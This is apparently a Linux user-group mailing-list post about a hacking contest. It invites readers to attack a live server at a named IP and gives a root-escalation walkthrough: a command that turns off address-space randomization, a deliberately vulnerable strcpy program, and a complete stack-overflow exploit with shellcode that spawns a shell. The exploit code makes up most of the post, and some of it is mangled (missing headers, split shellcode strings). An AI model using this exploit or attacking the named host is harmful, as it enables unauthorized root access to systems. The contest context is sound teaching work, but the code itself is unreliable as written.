None got root yet! We are leaving the target up available at http://24.251.219.96:8088 It's still open for encroachment through the weekend! HackFest results: http://plug.phoenix.az.us/comment/edit/126 Kudos to: PAVLOS KAIRIS TOOK the first SSH FLAG as nobody RW who followed by getting mysql access via SSH DrRabbit (Tuna) for his Windows Work OffFest! Here's how to escalate to root via overflowing the buffer: I turned off kernel protection for Linux kernels (a hole in kernels younger than 2.6-18): echo 0 > /proc/sys/kernel/randomize_va_space So you should be able to exploit this code: #include #include // 1024 bytes buffer // 4 bytes to overwrite ebp // 4 bytes to overwrite eip // 1032 bytes :) void viewer(char *string) { char buffer[1024]; strcpy(buffer,string); printf("You have entered: %s\n",buffer); return; } int main(int argc, char *argv[]) { if(argc < 2) { printf("%s \n",argv[0]); return 0; } viewer(argv[1]); return 0; } ---cut here--end This works: #include #include #include #define NOP 0x90 // defining the NOP #define VUL_FILE "./vuln" char shellcode[] = "\x31\xc0\x31\xdb\x31\xd2\x53\x68\x69\x74\x79\x0a\x 68\x65\x63" "\x75\x72\x68\x44\x4c\x20\x53\x89\xe1\xb2\x0f\xb0\x 04\xcd\x80" "\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\x31\xc0\x 50\x68\x6e" // our shellcode "\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x 24\x08\x50\x53" "\x8d\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x 80"; unsigned long get_sp(void) { __asm__("movl %esp, %eax"); // this function returns the stack pointer address, hopefully where } // our shellcode is stored. int main(int argc, char *argv[], char **envp) { int buff = 1032; // size of the vuln buffer. unsigned long addr = get_sp(); // addr of shellcode. char *ptr; // used for adding nops etc. if(argc > 1) buff = atoi(argv[1]); // if the user supplies a size, use this instead. if((buff % 4) != 0) // if the size is not a mem addr (divisable by 4) buff = buff + 4 - (buff % 4); // add 4 to it, take away the remainder (makes it divisable by 4) if((ptr = (char *)malloc(buff)) == NULL) // check to see you allocated enough memory. { printf("Error allocating memory.\n"); exit(0); } memset(ptr, NOP, buff); // fill the buffer with NOPS making our chances higher. memcpy(ptr + buff - strlen(shellcode) - 8, shellcode, strlen(shellcode)); // store the shellcode in the buffer. *(long *)&ptr[buff - 4] = addr; // make eip point to our shellcode. execl(VUL_FILE, "exploit example1", ptr, NULL); // execute the vuln program with our NOPS&shellcode in the buffer. printf("Addr: %s\n",addr); return 0; } ---end-- Easy as pI, right? get it? www.Obnosis.com | http://en.wiktionary.org/wiki/Citations:obnosis | (503)754-4452 Catch the January PLUG HackFest! Kristy Westphal, CSO for the AZ Department of Economic Security will provide a one hour presentation on forensics 1/10/09 Noon at UAT.edu. _________________________________________________________________ Send e-mail faster without improving your typing skills. http://windowslive.com/Explore/hotmail?ocid=TXT_TAGLM_WL_hotmail_acq_speed_122008